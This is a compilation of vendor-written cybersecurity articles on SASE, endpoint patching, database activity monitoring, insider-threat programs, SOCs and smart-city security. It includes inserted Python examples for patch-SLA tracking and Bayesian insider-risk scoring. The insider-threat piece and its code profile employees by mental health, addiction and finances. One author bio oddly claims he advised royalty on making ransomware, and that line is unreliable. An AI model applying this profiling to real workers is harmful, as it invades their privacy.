Remote Work Accelerates the Materialization of SASE

Which providers will be the ones to respond best to the future of remote work, the one where remote network access is fast, secure, and scalable? Surely not those who still offer singular firewall services, or those with a basic VPN solution. None of these solutions alone is enough to defend the network. Funnily enough, the blueprint for a single security product that might do so was created only months before the conditions that would necessitate it.

This security ‘blueprint’ is at the heart of a new industry space race. In fact, the idea is so young that it is prevalent largely among providers rather than the consumers of security, such as in-house IT professionals. Gartner coined the term SASE, or Secure Access Service Edge, to describe a unified network security product deployed over the cloud (SaaS), which would change how organizations consume security and refocus it around users.



Imagined as able to integrate directly with all the resources used by any organization, sans hardware, a SASE product will make it stunningly simple for the average IT employee to segment the network and create custom access profiles based on user roles, devices, or locations. At the same time he or she can enforce the use of advanced security features still sold separately, like IPsec tunneling, 2FA, DNS filtering, FWaaS, and CASB, and route employee traffic through secured gateways closest to wherever they choose to work.

The Beacon is Lit

It wasn’t the idea of SASE that signaled the starting gun for the security sector’s space race, it was the rush to support remote workers and the off-hand realization that SASE was a prebuilt solution. The rising trend of remote work has then also paralleled the prevalence of SASE in the market, and significant progress has occurred in the space to bring the horizon closer. In the near future, any enterprise-level company will only need to deploy a single product to secure its local and cloud networks, and the employees connecting to them from couches and cafes around the world.

Mergers and acquisitions are happening at breakneck speed in the security industry right now, and the landscape a year from now will be nearly unrecognizable. Reminiscent of how other industries have seen their products and services consolidated (the evolution of Microsoft’s product suite into Office 365 is a clear example), security is soon to become a matter of simply point and click.

About the Author

Amit Bareket is the Co-Founder and CEO of Perimeter 81. Amit is a cybersecurity expert with extensive experience in system architecture and software development. He is the author of 8 patents issued by the USPTO for storage, mobile applications and user interface. Prior to Perimeter 81, Amit worked as a Software Engineer for major enterprises including IBM XIV Storage and BigBand Networks. He served in the Israel Defense Force’s elite cyber intelligence unit and graduated Cum Laude with a B.Sc. in Computer Science and Economics from Tel Aviv University.



Organizations: It’s Time to Rethink How You Protect Environments from Within

By Richard Melick, senior technical product manager, Automox

Many of us have made the shift to virtual with our work, school and social lives, as we all aim to protect ourselves and the community during this uncertain time. As such, it’s important to understand that with new virtual workflows comes an expanded attack surface for hackers to potentially exploit.

In particular, many organizations are struggling with securing and hardening new and existing endpoints against critical vulnerabilities, an issue that has been exacerbated as remote work policies are enacted. Automox’s recent Cyber Hygiene Index surveyed 560 IT and security professionals and uncovered that less than 50 percent of organizations can patch vulnerable systems swiftly enough to protect against critical threats and zero-day attacks.

Endpoint hardening is a critical component of any security strategy, and if not properly managed, can pose a major threat to an organization's infrastructure. Attackers only need to find one way in to victimize a system or device, and an endpoint that isn't equipped with the latest patches and security configurations is likely to be rife with exploitable vulnerabilities. It is essentially leaving a door unlocked with a welcome sign out front for attackers.

Is it possible to lessen devastating data breaches within enterprises? Yes, but effective cyber hygiene measures must be put into place, especially during transitional and uncertain times like today.



The Ongoing Patching and Configuration Crisis

When you couple new potential entry points for hackers to exploit with the fact that organizations report taking up to 102 days for patches to be applied and tested, it is apparent that the enterprise attack surface is growing at an unprecedented rate.

To fully understand the scope of the issue, look no further than the WannaCry ransomware attack three years ago. The ransomware was able to spread rapidly by exploiting a known vulnerability (the SMBv1 flaw addressed by Microsoft’s MS17-010 update, released two months before the outbreak) that was left unpatched in a large majority of organizations for months, leading to one of the most notorious hacking events of our lifetime.

Research for the Automox Cyber Hygiene Index also confirmed that four out of five organizations have suffered at least one data breach in the last two years. When asked about the root causes, respondents placed phishing attacks (36%) at the top of the list, which is to be expected. Social engineering attacks continue to be a favorite initial vector that attackers use.

The surprising part of the results is that the majority of breaches could have been prevented with basic cyber hygiene practices in place. The other top causes were missing operating system patches (30%), missing application patches (28%), and operating system misconfigurations (27%), all of which are fundamentals of proper endpoint hardening.

The Industry is Failing to Keep Up

Adversaries are weaponizing new critical vulnerabilities within 7 days on average, and zero-day vulnerabilities are already weaponized at the moment of disclosure, yet companies are known to take weeks and in some cases months to deploy patches.

For this reason, a 24 / 72 threshold for endpoint hardening is imperative. If organizations commit to patching zero-days within 24 hours and other critical vulnerabilities within 72 hours, they will stay ahead of the average weaponization window and ultimately better protect their critical assets.

According to the recent survey, the industry is still catching up to meet this ambitious patching standard. Only 42 percent of companies can patch remote endpoints within three days and 15 percent within one, highlighting the struggles companies face with patching and hardening endpoints in remote environments.
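The 24 / 72 threshold above is easy to state and harder to measure. The following Python snippet is an added example, not Automox’s tooling or survey code: it takes a constructed endpoint inventory (host names, finding IDs and timestamps are all made up), computes how long each finding stayed exposed after disclosure, and reports which hosts breached the window and what fraction of closed findings met it. Findings that are still open count as breached once their window has passed, so a dashboard built on this cannot hide an unpatched host by simply never closing the ticket.

```python
from datetime import datetime, timezone

# Thresholds from the article: zero-days within 24 h, other criticals within 72 h.
SLA_HOURS = {"zero-day": 24, "critical": 72}

# Constructed inventory: one row per (host, finding). 'patched' is None while
# the fix has not been applied. Hosts, IDs and times are invented sample data.
INVENTORY = [
    # zero-day patched after 11 h: within the window
    {"host": "laptop-01", "vuln": "ZD-1", "severity": "zero-day",
     "disclosed": "2020-06-01T09:00:00Z", "patched": "2020-06-01T20:00:00Z"},
    # same zero-day patched after 30 h on another host: breached
    {"host": "laptop-02", "vuln": "ZD-1", "severity": "zero-day",
     "disclosed": "2020-06-01T09:00:00Z", "patched": "2020-06-02T15:00:00Z"},
    # critical patched after 48 h: within the window
    {"host": "laptop-01", "vuln": "CRIT-7", "severity": "critical",
     "disclosed": "2020-06-03T00:00:00Z", "patched": "2020-06-05T00:00:00Z"},
    # critical still unpatched five days after disclosure: breached and open
    {"host": "laptop-03", "vuln": "CRIT-7", "severity": "critical",
     "disclosed": "2020-06-03T00:00:00Z", "patched": None},
    # critical disclosed 10 h ago and still open: not yet breached
    {"host": "laptop-04", "vuln": "CRIT-9", "severity": "critical",
     "disclosed": "2020-06-07T14:00:00Z", "patched": None},
]

# Constructed "current time" so the example is reproducible offline.
NOW = datetime(2020, 6, 8, 0, 0, tzinfo=timezone.utc)


def parse_ts(value):
    """Parse the ISO-8601 UTC timestamps used in the inventory."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hours_exposed(row, now):
    """Hours from disclosure to patch, or to `now` if the finding is still open."""
    start = parse_ts(row["disclosed"])
    end = parse_ts(row["patched"]) if row["patched"] else now
    return (end - start).total_seconds() / 3600.0


def classify(row, now):
    """met / breached for closed findings; open-in-window / open-breached for open ones."""
    limit = SLA_HOURS[row["severity"]]
    hours = hours_exposed(row, now)
    if row["patched"] is None:
        return "open-breached" if hours > limit else "open-in-window"
    return "met" if hours <= limit else "breached"


def evaluate(inventory, now):
    """Annotate every row with its exposure in hours and its SLA status."""
    return [dict(row, hours=round(hours_exposed(row, now), 1), status=classify(row, now))
            for row in inventory]


def compliance(inventory, now):
    """Fraction of closed findings that met their window, per severity (None if no data)."""
    result = {}
    for severity in SLA_HOURS:
        closed = [r for r in inventory if r["severity"] == severity and r["patched"]]
        met = [r for r in closed if classify(r, now) == "met"]
        result[severity] = len(met) / len(closed) if closed else None
    return result


def breaches(inventory, now):
    """(host, finding, status) for every row outside its window, open or closed."""
    return sorted((r["host"], r["vuln"], r["status"])
                  for r in evaluate(inventory, now) if "breached" in r["status"])


if __name__ == "__main__":
    for row in evaluate(INVENTORY, NOW):
        print(f'{row["host"]:10} {row["vuln"]:7} {row["severity"]:9} {row["hours"]:7.1f} h  {row["status"]}')
    print("compliance:", compliance(INVENTORY, NOW))
    print("breaches:", breaches(INVENTORY, NOW))
```

The split between closed-finding compliance and the breach list is deliberate: the percentage is what a survey like the one above reports, while the breach list (which includes still-open findings) is what an operator actually needs to act on.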

Embracing Newer Technologies to Help

One of the more positive outcomes from the research is that companies are increasingly embracing automation as a potential antidote for the security challenges that they are currently facing.

The findings showed that 96 percent of organizations have deployed some automation for endpoint patching and hardening, yet only 23 percent are fully automated.



While newer technologies, such as automation, are not a silver bullet, they sure can help ease the efforts in protecting infrastructure and executing complex tasks in a timely manner. This effectively eases the burden on IT and SecOps teams, all while maintaining better security for the organization as a whole, a true win-win scenario.

The Answer to Better Cyber Hygiene?

Good cyber hygiene doesn't have to be complicated. A great place to start the transition to a more modern approach is to audit your organization and take a look at how it leverages its people, processes and technologies to better secure its endpoints and other assets.

Are our people being put in a position to succeed? What processes could be eliminated or improved? Are we getting enough out of our technologies to make our security team’s workflow easier?

By answering these important questions and acting on that information, organizations will have a better understanding of how they can adapt their strategies to address today’s and tomorrow’s challenges.

In times of uncertainty, it’s important that businesses look for long-term fixes, as opposed to putting a band-aid on issues that are likely to pop up again. The future of work is remote, and it’s critically important that decision-makers across every industry set their IT and security teams up for future success while meeting the standards they need to meet today.

About the Author

Richard Melick, senior technical product manager, Automox. Richard has spent over a decade advancing through the security industry, with considerable experience and a particular focus on the stories surrounding ransomware, hacking, and cyber attacks. He has been a security speaker on five continents and has even advised royalty on how to make and distribute ransomware.

Richard can be reached online at (Automox@famapr.com, @AutomoxApp, etc.) and at our company website https://www.automox.com/



Don’t Be Breached When Using Commercial Software Products

By Randy Reiter, CEO of Don’t Be Breached

In May 2020 the software giant SAP made available eighteen security fixes for its Adaptive Server Enterprise (ASE) database system (formerly Sybase ASE). ASE is used by SAP products and 30,000 organizations worldwide. 90% of the top 50 banks and security firms use ASE.

Four of the eighteen security fixes had a CVSS score of 8 or higher. The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. Vulnerabilities are scored from 0 to 10, with 10 being the most severe.

One of the security fixes was for a SQL injection vulnerability that allowed any user of a database, regardless of their permission level, to gain administrator access to the entire database. Wow.

SAP software products are comprehensive and complex. SAP customers have added on average up to 2 million lines of custom code to their deployment. This makes applying security patches a lengthy process due to comprehensive application testing requirements prior to deployment of the security fixes.

Other 2020 Database Security Vulnerabilities:

• June 2020. The KingMiner botnet operation targets SQL Server databases with brute-force attacks. The KingMiner botnet has been active since 2018. Once KingMiner gains access to SQL Server, it is capable of gaining full administrative control of the underlying Windows server.

• May 2020. A hacker leaked online the database for 7,600 websites serviced by Daniel’s Hosting. Daniel’s Hosting is the largest free web hosting provider for Dark Web services. The leaked database included 3,000+ email addresses, 7,000+ account passwords and 8,000+ private keys for .onion (dark web) domains.

How to Protect Confidential Database Data from Insider Threats and Hackers?

Confidential database data includes credit card, tax ID, medical, social media, corporate, manufacturing, law enforcement, defense, homeland security and public utility data. This data is almost always stored in Cassandra, DB2, Informix, MongoDB, MariaDB, MySQL, Oracle, PostgreSQL, SAP HANA, SQL Server and Sybase databases. Once inside the security perimeter, a hacker or rogue insider can use commonly installed database utilities to steal confidential database data.

Non-intrusive network sniffing can capture and analyze the normal database query and SQL activity from a network tap or proxy server with no impact on the database server. (If client sessions are TLS-encrypted, the tap must sit where the traffic is in the clear, for example behind a TLS-terminating proxy.) This SQL activity is very predictable: database servers servicing 10,000 end users typically process 2,000 to 10,000 unique query or SQL commands a day, and those commands run millions of times a day.

Advanced SQL Behavioral Analysis of Database Query and SQL Activity

Advanced SQL Behavioral Analysis of the database SQL activity can learn what the normal database activity is. Then, from a network tap or proxy server, the database query and SQL activity can be non-intrusively monitored in real time and non-normal SQL activity immediately identified. Non-normal SQL activity from Hackers or Rogue Insiders can be detected in a few milliseconds. The Hacker or Rogue Insider database session can be immediately terminated and the Security Team notified so that confidential database data is not stolen.

Advanced SQL Behavioral Analysis of the query activity can go even further and learn the maximum amount of data queried, plus the IP addresses all queries were submitted from, for each of the 2,000 to 10,000 unique SQL queries sent to a database. This type of data protection can detect never-before-observed query activity, queries sent from a never-observed IP address, and queries sending more data to an IP address than the query has ever sent before. This allows real-time detection of Hackers and Rogue Insiders attempting to steal confidential web site database data. Once detected, the security team can be notified within a few milliseconds so that a data breach is prevented.

About the Author

Randy Reiter is the CEO of Don’t Be Breached, a Sql Power Tools company. He is the architect of the Database Cyber Security Guard product, a database data breach prevention product for Informix, MariaDB, Microsoft SQL Server, MySQL, Oracle and Sybase databases. He has a Master’s Degree in Computer Science and has worked extensively over the past 25 years with real-time network sniffing and database security. Randy can be reached online at rreiter@DontBeBreached.com, www.DontBeBreached.com and www.SqlPower.com/Cyber-Attacks.


Is Proactive Insider Risk Mitigation Possible?

Why Companies Need More Than Technical Indicators to Identify Their Biggest Threats Before They Do Harm

By David A. Sanders, Director of Insider Threat Operations, Haystax

Most corporate insider threat programs are structured and equipped to mitigate adverse events perpetrated by trusted insiders only after they have occurred. But proactive insider risk management is possible – and it starts with a robust approach to detection.

Consider this scenario, based on a real-life case, in which a concerning insider threat event turns out to be more complicated than expected:

John commented to other employees that it would be easy to take down the new cloud services his company recently migrated to from their on-premises systems. The employees reported the comment to their manager, who reported it to human resources and ultimately the company’s insider threat program. An investigation revealed that John was angry because his role had changed with the new architecture. In addition, he was clinically depressed, off medication and had suicidal thoughts. The investigative results prompted a coordinated response among the insider threat program, security, legal and human resources. The threat was mitigated, with the final step of referring John to the employee assistance program.

Because the insider threat team was notified about one behavioral indicator of a high-impact event, additional indicators were gathered and assessed to determine that John was a potential threat to the company and to himself. In doing so, the company was able to intervene and proactively mitigate an insider threat event before it occurred. The resulting cost and impact were minimal. By contrast, the projected cost and impact of the cloud services being taken off-line for one day were very high.

It is impossible to know whether John would have committed an act of sabotage or self-harm, but the mitigation efforts nevertheless reduced the chances and allowed John to remain employed and productive.

Without a proactive response, the alternative is to detect and respond to an event after it occurs, incurring the cost of the impact and then attempting to minimize the effect.

The Path to Proactive Risk Mitigation

Eric Shaw and Laura Sellers created the ‘Critical Path to Insider Risk’ in 2015, after studying insider threat cases in the U.S. intelligence community and at the Department of Defense. They concluded that perpetrators exhibit observable indicators prior to their acts. This concept is represented in the graphic below.

Source: Eric Shaw and Laura Sellers (2015), "Application of the Critical-Path Method to Evaluate Insider Risks," Studies in Intelligence, Volume 59, Number 2, June, pages 41-48. The Central Intelligence Agency, Washington, DC.

The practical application of these findings is that knowledge of ‘personal predispositions’ and behavioral indicators can inform the judgment of experts to determine whether an insider is on the path to becoming a risk.

Based on that judgment, a measured and effective response can be planned to assess the risk through preliminary assessments – and perhaps a complete investigation, if warranted. The goal is to mitigate or prevent the insider risk event by engaging with the potential threat early. This is precisely what occurred in John’s case. The company responded effectively to ‘turn John around’ and prevent potentially hostile and harmful acts from occurring.

Technical and Non-Technical Risk Indicators

The Defense Counterintelligence and Security Agency (DCSA) Center for Development of Security Excellence published a list of potential risk indicators, which are categorized below into ‘Technical Indicators’ and ‘Non-Technical Indicators.’ Technical indicators can be detected by monitoring and analyzing computer and network activities. Non-technical indicators typically occur off the computer and network and therefore cannot be detected on those systems.

Insider threat potential risk indicators categorized by whether or not they can be commonly detected by monitoring computer and network activity.

While the average enterprise insider threat program might not share the same objectives as DCSA, the agency’s human-centric view of the challenge is instructive to companies because the cause of insider threat problems is, by definition, known individuals associated with and managed by the organization. Effort and resources allocated to gathering, integrating and analyzing non-technical indicators to better know those individuals can improve the effectiveness of programs that mostly rely on technical indicators to prioritize higher-risk employees. In this regard, non-technical indicators help programs to get ahead of insider threat problems, rather than simply react to them.

Using Non-Technical Risk Indicators

Non-technical indicators are available within most company systems. For example, human resource information systems will contain data about promotions, demotions, suspensions, performance ratings, training records and previous employers. Security information systems may have records of violations, anomalous attempts to gain access to unauthorized areas and, in the case of the defense and aerospace industry, security-clearance denials.

Facilitating the identification and reporting of additional kinds of non-technical behaviors can be more challenging. For example, ‘See Something, Say Something’ programs have limited utility for multiple reasons. First, co-workers often do not consciously recognize the indicators until they are significant or until something bad happens. Second, if they do recognize a concern, they rarely report it because they do not see it as significant, or they do not want to get someone they like in trouble.

To overcome these challenges, insider threat programs need to repeatedly communicate that the goal of the program is to mitigate risks in a proactive and positive manner, helping employees while protecting company assets. As this goal is accomplished, stakeholders, supervisors and employees will take notice, which will increase compliance and participation in the reporting program.

Next, insider threat programs need to facilitate the reporting of anomalous activity by supervisors. This can be accomplished via direct conversations, indirectly through human resources or by using surveys. The results of this reporting should then inform the insider threat program’s threat detection capability.

Temporal Analysis

The importance of integrating and analyzing indicators over time cannot be overstated. Let’s consider a fictitious scenario where there are non-technical behavioral indicators that increase the threat level of an employee:

Jolene has been with her company for three years. Initially she was a good performer, but that has changed over the past two years. She has grown increasingly unhappy with her job as a database administrator and her personal life is in shambles. She finds her role trivial and she feels the company is not treating her fairly compared to others, which she has expressed to human resources. She applied for a position in another department but was not selected, which made her even more angry and frustrated. She has access to mission-critical systems with authorization to create and destroy databases, tables and records. Her supervisor works from another office location, and does not meet with her more than once every two weeks. Outside of work, Jolene barely has enough money to pay rent for a two-bedroom apartment since her boyfriend left town. Moreover, she recently wrecked her truck and her cat is sick again. She is not sleeping well and has turned to drugs and alcohol.

Jolene has moved far along the critical path to insider risk. She has multiple stressors, exhibits concerning behaviors and has experienced problematic organizational responses. And she has access to critical company systems.

It would be wise to fully evaluate and then mitigate any risk that Jolene presents, with the goal of protecting company assets and assisting a struggling employee. Yet very few companies have the capability to assemble and analyze this non-technical information to effectively identify when an insider like Jolene is on the path to insider risk. Assessing employees’ private lives through background or credit checks or other measures is not even necessary in most cases; many other indicators are already collected by the organization and readily available.

The inadequate use of non-technical indicators might be due to the fact that many insider threat programs grow out of existing cyber security programs using management tools such as UEBA and SIEM, which were developed to evaluate large volumes of technical data using rules and machine learning to identify technical behavioral anomalies.

As discussed above, when looking at insider threats as caused by known humans, these technical indicators are perhaps one-third of the picture. Risk-scoring models built solely around technical indicators are not designed to put the anomalies that they detect into the broader context of the critical path to insider risk. These models can only be effective if they add non-technical behavioral indicators to the analytical mix.

Multi-Disciplinary Technology Platforms for Evaluating Insider Threats

Insider threat programs should consist of diverse experts representing human resources, legal, information security, cybersecurity, information technology, physical security, behavioral science and counterintelligence. These disciplines bring data and perspective when evaluating insider threats. They weigh evidence and give opinions on whether the behavior is indicative of a threat.

The problem is that this approach does not scale well in organizations with large numbers of employees, since no team of experts could keep up.

But the experts can share their judgments and wisdom in analytic tools that apply complex reasoning that goes into contextualized analysis of insider threats. For this approach, Bayesian inference networks are an ideal solution.

Bayesian networks can be built to probabilistically model expert reasoning across multiple domains using the full range of technical and non-technical behavioral indicators of insider risk. The result is a vastly improved capability to identify high-risk insiders that have committed threat activities, as well as those who are on the Critical Path to potentially commit them in the future. The probabilistic model enables the desired proactive response necessary to protect company assets, including the insiders themselves.
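An added illustration of the point made in this section and in the Jolene scenario above, not Haystax's model or the article's own code: a minimal Bayesian network with one hidden "on the critical path" node and conditionally independent indicator children, so that technical and non-technical indicators combine into a single posterior. All base rates and conditional probabilities are constructed stand-ins for expert-elicited values, and the employee cases are fictitious.

```python
# Constructed base rate of insiders currently on the critical path.
PRIOR_ON_PATH = 0.02

# Conditional probability table, one entry per indicator:
#   (P(indicator observed | on path), P(indicator observed | not on path)).
# The values are constructed, standing in for probabilities an expert panel would elicit.
INDICATORS = {
    # technical indicators (detectable from host/network telemetry)
    "after_hours_access":  (0.60, 0.20),
    "bulk_data_transfer":  (0.50, 0.05),
    # non-technical indicators (HR records, security office, supervisor reports)
    "hr_grievance":        (0.60, 0.10),
    "disciplinary_action": (0.40, 0.05),
    "financial_stress":    (0.50, 0.10),
}
TECHNICAL = {"after_hours_access", "bulk_data_transfer"}


def posterior_on_path(evidence, prior=PRIOR_ON_PATH, cpt=INDICATORS):
    """P(on path | evidence) for a star-shaped network: every observed indicator
    contributes its likelihood ratio; indicators missing from `evidence` are
    unobserved and are marginalised out, which here means they are skipped."""
    like_on, like_off = prior, 1.0 - prior
    for name, observed in evidence.items():
        p_on, p_off = cpt[name]
        like_on *= p_on if observed else 1.0 - p_on
        like_off *= p_off if observed else 1.0 - p_off
    return like_on / (like_on + like_off)


def technical_only(evidence):
    """What a UEBA/SIEM-style model sees: the technical subset of the evidence."""
    return {k: v for k, v in evidence.items() if k in TECHNICAL}


def rank_employees(cases):
    """Prioritise employees for review, highest posterior first, using all indicators."""
    scored = [(name, posterior_on_path(ev)) for name, ev in cases.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


# Fictitious cases. Jolene and Alex look identical on technical telemetry alone;
# the non-technical indicators are what separate them.
JOLENE = {"after_hours_access": True, "bulk_data_transfer": True,
          "hr_grievance": True, "disciplinary_action": True, "financial_stress": True}
ALEX = {"after_hours_access": True, "bulk_data_transfer": True,
        "hr_grievance": False, "financial_stress": False}   # disciplinary_action unobserved
SAM = {"after_hours_access": True}
CASES = {"jolene": JOLENE, "alex": ALEX, "sam": SAM}


if __name__ == "__main__":
    for name, ev in CASES.items():
        print(f"{name:7s} technical-only={posterior_on_path(technical_only(ev)):.3f} "
              f"all-indicators={posterior_on_path(ev):.3f}")
    print("review order:", [n for n, _ in rank_employees(CASES)])
```

With only the technical indicators, Jolene and Alex both score about 0.38; adding the non-technical indicators moves Jolene above 0.99 and Alex down to about 0.13, which is the contextualisation the section argues for.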

About the Author

David Sanders is Director of Insider Threat Operations at Haystax, a business unit of Fishtech Group. Previously, he designed and managed the insider threat program at Harris Corporation, now L3Harris Technologies. David also served on the U.S. government’s National Insider Threat Task Force (NITTF). David can be reached online at dsanders@haystax.com or https://www.linkedin.com/in/david-sandershaystax/ and at our company website http://www.haystax.com/


Benefits of a Security Operations Center (SOC)

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt

The creation of a Security Operations Center (SOC) has increasingly stood out as something necessary to help companies defend themselves against damage caused by cyber-attacks. The SOC is considered the kernel of an organization's security operations, the purpose of which is to provide detection and response services for security incidents.

The creation of a SOC from scratch involves a large investment in human and technological resources, especially when it is intended to maintain operations on a full-scale 24×7 basis. Implementing a SOC solution goes far beyond buying technologies and putting them into operation. First, there is a great shortage of qualified professionals, which makes it a real challenge to bring them into your organization. From a technological perspective, the right equipment and the right platforms can help you automate or at least optimize your incident detection and response capabilities. How to decide the best option: implement or hire a SOC? The answer is not simple.

Create your own SOC or Hire a third-party SOC

One of the advantages of creating your own SOC is having a team exclusively dedicated to achieving your goals. This team will have a deep understanding of the business. They will better understand the general context around events and have more knowledge about how you operate, in contrast to a third-party SOC.

On the other hand, buying a SOC solution can be cost-effective. You may not need to buy software or equipment directly, and you won't have to hire or manage the team full time. A Managed Security Service Provider (MSSP) will take care of everything for you - from the integrity of the infrastructure to triage and incident response. Since obtaining technology and personnel will not be a preoccupation for you, the total investment value may end up being much lower.

How to choose the best option

The responses are not linear, but some questions can help you to make the final judgment.

• How do security and the SOC align with the business strategy and mission?

• Do you intend to operate on a 24×7 scale?

• Are the investments involved justified?

• Does your business need greater control by demanding its own SOC?

• What would happen to your business if it suffered a security breach?

When considering the last question, if the impact is minimal, it is suggested to hire a SOC solution. If the impact is quite significant, then I advise you to develop your own SOC solution.

Developing a SOC can be very costly if not done in the right way. Some mistakes can even compromise your business goals and objectives. The lack of experienced professionals in the market definitely makes managing your own SOC a little more challenging - the demand is huge and your partners and competitors are looking for the same resources as you.

In sum, the challenge of implementing a SOC in your organization is enormous, but the benefits are considerable:

• Continuous Protection: Having a command center that monitors your network and/or facility 24/7.

• Timely Response: The gap between a critical event and the response time narrows.

• Help Customers/Stakeholders Feel Secure: A security command center can serve external and internal marketing purposes as well.

• Simplify Investigations: Having the capabilities of a security operations center on hand can expedite the process of analysis.

And last but not least, a SOC solution can provide insight on identifying threats before they become critical events.


About the Author

Pedro Tavares is a cybersecurity professional and a founding member of CSIRT.UBI and Editor-in-Chief of seguranca-informatica.pt.

In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics: malware, ethical hacking (OSCP-certified), cybersecurity, IoT and security in computer networks. He is also a Freelance Writer.

Segurança Informática blog: www.seguranca-informatica.pt

LinkedIn: https://www.linkedin.com/in/sirpedrotavares

Twitter: https://twitter.com/sirpedrotavares

Contact me: ptavares@seguranca-informatica.pt


In 2020, SOCs Are Understaffed Yet Overconfident in Ability to Detect Cyberthreats

Exabeam’s ‘2020 State of the SOC Report’ offers peer-to-peer SOC comparisons

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager, Exabeam

Security operations centers (SOCs) are on the frontlines in protecting businesses and government agencies against cyberthreats and attacks. Therefore, whether the organization has an in-house or outsourced SOC, it’s critical to gauge its effectiveness, given the importance it plays in the overall cybersecurity posture.

Exabeam’s 2020 State of the SOC Report allows organizations to compare their SOCs to those of their peers around the globe and determine common pitfalls, priorities and ways to improve technology, staffing, employee happiness and more. Highlights include:

This report is Exabeam’s third annual comprehensive survey of cybersecurity professionals who manage and operate SOCs. Respondents include CISOs, CIOs, frontline security analysts, and security managers from the U.S., U.K., Canada, Germany, and Australia. The report covers a wide range of topics including basic SOC operations, hiring and staffing, operational processes, technology, and finance and budget.

Key findings include that SOC leaders and analysts are confident in their ability to detect common security threats, but leaders and frontline analysts do not agree on the most common threats facing the organization. SOC leaders believe that phishing and supply chain vulnerabilities are more important issues, while analysts see DDoS attacks and ransomware as greater threats.

However, threat hunting and the ability to remediate threats effectively stand out as critical skills that SOC personnel feel they lack. This gap may indicate that SOCs are overconfident in their ability to detect a full range of security threats.

Figure 1: Eighty-two percent of SOC professionals are confident in their ability to detect threats.

Figure 2: SOC leaders believe that phishing and supply chain vulnerabilities are more important issues, while analysts see DDoS attacks and ransomware as greater threats.

In last year’s report, respondents cited personal and social skills as the most critical soft skill for SOC employees. This year, however, 62% of respondents noted the ability to work in teams as the most important soft skill.

Figure 3: While hard skills remain critical, SOCs place emphasis on soft skills, with the ability to work in teams taking precedence over formerly reported social ability.

The importance placed on teaming is an indication that SOC staff need to work in cohesive teams and often with staff from other teams. SOC members that work as a team are more apt to document processes to standardize tasks and train new employees, which is helpful both as teams grow and as staff are reassigned.

Members of a SOC should not only improve teaming among their group, but also proactively strengthen their working relationship with other functional groups, including IT operations, NOC staff, and increasingly, DevOps. Working with these other groups helps to improve response time. More important, it will create a team that is responsive and able to adapt as the work environment shifts due to challenges like working with a distributed workforce and ensuring the right collaboration and communications tools and culture are in place.

The report also reveals a significant decline in the ability to do threat modeling in both U.S. and U.K. SOCs. Threat modeling is the systematic approach to identifying and prioritizing potential security threats and designing countermeasures to prevent them. The data suggests threat modeling doesn’t have an agreed-upon standard, and most analysts perform it infrequently or not at all.

Additionally, the ability to conduct incident analysis and budget and resource allocation for both countries has declined from the previous year.

Figure 4: U.S. and U.K. SOCs reported significant declines in their ability to do threat modeling, incident analysis and budget/resource allocation in YoY change.

The findings also show that when asked to rate pain points, inexperienced staff and time spent on reporting/documentation were common issues for managers and frontline employees but not for executives.

Lending credence again to the statement, “you can’t protect what you can’t see,” senior leaders noted that the lack of visibility and not having a good list of assets were their most significant pain points.

Figure 5: Inexperienced staff and too much time spent on reporting and documentation continue to be pain points for SOCs in 2020.

Traditionally, SOC teams have generally been responsible for two primary responsibilities — investigating suspicious activities and maintaining security tools. But over the years, the responsibilities of the SOC have increased to include other duties such as defining security metrics and incident response. Our report finds that staff at all levels share these responsibilities. However, there are a couple of differences.

CIOs and CISOs rank their responsibility for operations management as well as policy and procedure development highest. They also share other responsibilities with managers and frontline employees, including defining security objectives and metrics and incident response. Not surprisingly, maintaining security monitoring tools was noted as a critical responsibility for frontline employees.

Figure 6: SOC managers drive metrics specifically in operations and management and procedure and policy development.

Download the complete report to learn other points of interest that can help measure the effectiveness of your SOC and support you in your ongoing efforts to protect your organization.

About the Author

Samantha Humphries

Senior Product Marketing Manager

Samantha has 20 years of experience in cyber security. She has defined strategy for multiple security products and technologies, helped hundreds of organisations of all shapes, sizes, and geographies recover and learn from cyberattacks, and trained anyone who’ll listen on security concepts and solutions. She authors articles for various security publications, and is a regular speaker and volunteer at industry events, including BSides, IPExpo, CyberSecurityX, The Diana Initiative, and Blue Team Village (DEFCON).

Stephen Moore

Chief Security Strategist

Steve Moore is Vice President and Chief Security Strategist at Exabeam, helping drive solutions for threat detection and advising customers on security programs and breach response. He is the host of “The New CISO Podcast” and a Forbes Tech Council member. Prior to Exabeam, Moore served as Staff VP of Cybersecurity Analytics at Anthem, a Fortune 30 healthcare company. Moore’s experience includes leading the investigation of state-sponsored cyberespionage campaigns, breach response, associated legal depositions, and client management. He’s passionate about cybersecurity, teamwork and leadership excellence.


Software-Defined Perimeters Offer Secure Connectivity to Smart Cities

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)

Smart cities are on the rise—in a really big way. According to Microsoft, smart-city initiatives—which can be defined as cities that rely on Internet of Things (IoT) sensors to obtain data that’s then mined to guide management of city services and resources—account for nearly a quarter (23 percent) of the world’s IoT projects.

As the number of smart cities mushrooms, these hyperconnected urban areas are becoming increasingly critical to how seamlessly cities are able to operate. This is an important point to grasp, since cities serve as the linchpin for most of the world’s data generation, as well as the majority of all energy consumption. What’s more, most of us live in cities. The UN reports that just over half (55 percent) of the world’s population makes a city their home—a figure that the UN predicts will rise significantly (close to 70 percent) in the next 30 years.

Here are some additional stats to impress upon you the importance of our urban areas in general, and smart city growth in particular:

• Forbes reports that by 2025, we’ll be looking at approximately 80 billion smart devices.

• By then, our global cities may be cranking out up to 180 zettabytes of data.

• In terms of energy, The World Bank reports that our urban meccas already consume up to 80 percent of energy worldwide.

• Over the next decade, cities will likely be responsible for close to three-quarters (74 percent) of global greenhouse gases, up from around two-thirds, or 67 percent, currently.

Adding Predictability with Smart Edge Devices

It can feel overwhelming to consider the vast scope of the challenges that face today’s cities. Cities are charged with managing an ever-expanding laundry list of problems, including transportation, water and energy, public health, infrastructure, public safety, waste reduction, and more. As the current COVID-19 pandemic is showing, the high population and density of cities can quickly turn them into a hotbed of issues that require the best that technology can offer to aid communication and mitigate complexities.

